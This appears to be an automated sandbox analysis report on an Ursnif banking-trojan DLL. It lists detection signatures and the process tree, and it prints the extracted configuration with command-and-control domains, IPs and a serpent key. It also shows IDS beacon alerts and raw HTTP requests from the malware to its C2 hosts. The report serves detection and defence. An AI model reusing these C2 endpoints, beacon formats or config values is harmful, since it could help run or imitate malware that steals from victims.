Edit tour

Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

Sample Name:	hFGZpat9Mf.dll
Analysis ID:	560543
MD5:	9acde2c3e3a375590a1bc716eabc52c5
SHA1:	e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256:	57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
Tags:	dllGoziISFBUrsnif
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Writes or reads registry keys via WMI

Found API chain indicative of debugger detection

Machine Learning detection for sample

Found evasive API chain (may stop execution after checking system information)

Sigma detected: Suspicious Call by Ordinal

Writes registry values via WMI

Contains functionality to detect sleep reduction / modifications

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality to record screenshots

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 988 cmdline: loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 5904 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 3272 cmdline: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 988	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.ee0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.ee0000.6.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.1080000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.1080000.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.9e0000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.1080000.7.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.1080000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.ed0184.5.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.ed0184.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.9e0000.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.2500000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.1080000.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.890184.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.1080000.7.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.ee0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.2a094a0.5.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.8a0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.2a094a0.5.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.0.rundll32.exe.ed0184.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 14 entries

Sigma Overview

System Summary

Sigma detected: Suspicious Call by Ordinal

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5904, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1, ProcessId: 3272

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Multi AV Scanner detection for submitted file

Source: hFGZpat9Mf.dll	Virustotal: Detection: 20%			Perma Link
Source: hFGZpat9Mf.dll	ReversingLabs: Detection: 32%

Antivirus detection for URL or domain

Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk	Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk	Avira URL Cloud: Label: malware
Source: http://habpfans.at/	Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w	Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk	Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk	Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/	Avira URL Cloud: Label: malware
Source: http://habpfans.at/g	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: giporedtrip.at	Virustotal: Detection: 11%			Perma Link
Source: habpfans.at	Virustotal: Detection: 11%			Perma Link

Machine Learning detection for sample

Source: hFGZpat9Mf.dll

Joe Sandbox ML: detected

Source: 3.0.rundll32.exe.1080000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.890184.1.unpack	Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.5.unpack	Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.1.unpack	Avira: Label: TR/Kazy.4159236
Source: 3.2.rundll32.exe.1080000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.9e0000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.0.rundll32.exe.1080000.7.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.ed0184.1.unpack	Avira: Label: TR/Kazy.4159236

Source: hFGZpat9Mf.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		3_2_00E153C4

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80

Source: Joe Sandbox View	ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View	ASN Name: TE-ASTE-ASEG TE-ASTE-ASEG

Source: Joe Sandbox View

IP Address: 181.129.180.251 181.129.180.251

Source: global traffic	HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic	HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic	HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
